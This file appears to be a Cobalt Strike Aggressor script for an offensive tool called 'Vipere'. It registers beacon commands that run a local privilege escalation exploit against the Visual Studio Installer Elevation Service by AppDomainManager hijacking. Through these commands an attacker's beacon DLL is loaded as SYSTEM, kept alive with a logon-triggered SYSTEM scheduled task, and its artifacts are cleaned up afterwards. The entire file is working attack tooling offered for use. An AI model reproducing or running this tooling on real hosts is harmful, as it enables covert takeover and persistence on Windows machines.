Files

119 lines
3.6 KiB
Plaintext

# Vipere - VS Installer LPE via AppDomainManager Hijacking
# CobaltStrike Aggressor Script
beacon_command_register(
"vipere-check",
"Detect service + persistence state",
"Synopsis: vipere-check\n\nDetects VS Installer Elevation Service state and persistence artifacts.\nNo arguments required."
);
beacon_command_register(
"vipere-prepare",
"Download VS Installer from microsoft.com",
"Synopsis: vipere-prepare\n\nDownloads vs_BuildTools.exe from aka.ms and registers the service.\nRequires: Admin, Internet access."
);
beacon_command_register(
"vipere-exploit",
"AppDomainManager hijack service -> SYSTEM",
"Synopsis: vipere-exploit /path/to/beacon.dll\n\nDeploys AppDomainManager hijack on the VS Installer service.\nLoads beacon DLL as SYSTEM via LoadLibrary in-process.\nRequires: Admin, service must exist."
);
beacon_command_register(
"vipere-persist",
"Scheduled task + AppDomainManager persistence",
"Synopsis: vipere-persist /path/to/beacon.dll\n\nCopies vs_installershell.exe to ProgramData, deploys AppDomainManager chain,\ncreates scheduled task (logon trigger, runs as SYSTEM).\nRequires: Admin."
);
beacon_command_register(
"vipere-full",
"Full auto: prepare + exploit + persist",
"Synopsis: vipere-full /path/to/beacon.dll\n\nOne-shot: downloads VS Installer, deploys AppDomainManager hijack,\ncreates persistence. Beacon loaded as SYSTEM.\nRequires: Admin, Internet access."
);
beacon_command_register(
"vipere-cleanup",
"Stop service + remove all artifacts + restore originals",
"Synopsis: vipere-cleanup\n\nStops service, kills persist process, removes all dropped files,\nrestores original .config from backup.\nRequires: Admin."
);
sub _vipere_bof {
local('$handle $data');
$handle = openf(script_resource("dist/lpe_vs_bootstrap.x64.o"));
$data = readb($handle, -1);
closef($handle);
return $data;
}
alias vipere-check {
local('$data $args');
$data = _vipere_bof();
$args = bof_pack($1, "z", "check");
beacon_inline_execute($1, $data, "go", $args);
}
alias vipere-prepare {
local('$data $args');
$data = _vipere_bof();
$args = bof_pack($1, "z", "prepare");
beacon_inline_execute($1, $data, "go", $args);
}
alias vipere-exploit {
local('$data $args $dll_handle $dll_data');
if ($2 eq "") {
berror($1, "Usage: vipere-exploit /path/to/beacon.dll");
return;
}
$dll_handle = openf($2);
$dll_data = readb($dll_handle, -1);
closef($dll_handle);
$data = _vipere_bof();
$args = bof_pack($1, "zb", "exploit", $dll_data);
beacon_inline_execute($1, $data, "go", $args);
}
alias vipere-persist {
local('$data $args $dll_handle $dll_data');
if ($2 eq "") {
berror($1, "Usage: vipere-persist /path/to/beacon.dll");
return;
}
$dll_handle = openf($2);
$dll_data = readb($dll_handle, -1);
closef($dll_handle);
$data = _vipere_bof();
$args = bof_pack($1, "zb", "persist", $dll_data);
beacon_inline_execute($1, $data, "go", $args);
}
alias vipere-full {
local('$data $args $dll_handle $dll_data');
if ($2 eq "") {
berror($1, "Usage: vipere-full /path/to/beacon.dll");
return;
}
$dll_handle = openf($2);
$dll_data = readb($dll_handle, -1);
closef($dll_handle);
$data = _vipere_bof();
$args = bof_pack($1, "zb", "full", $dll_data);
beacon_inline_execute($1, $data, "go", $args);
}
alias vipere-cleanup {
local('$data $args');
$data = _vipere_bof();
$args = bof_pack($1, "z", "cleanup");
beacon_inline_execute($1, $data, "go", $args);
}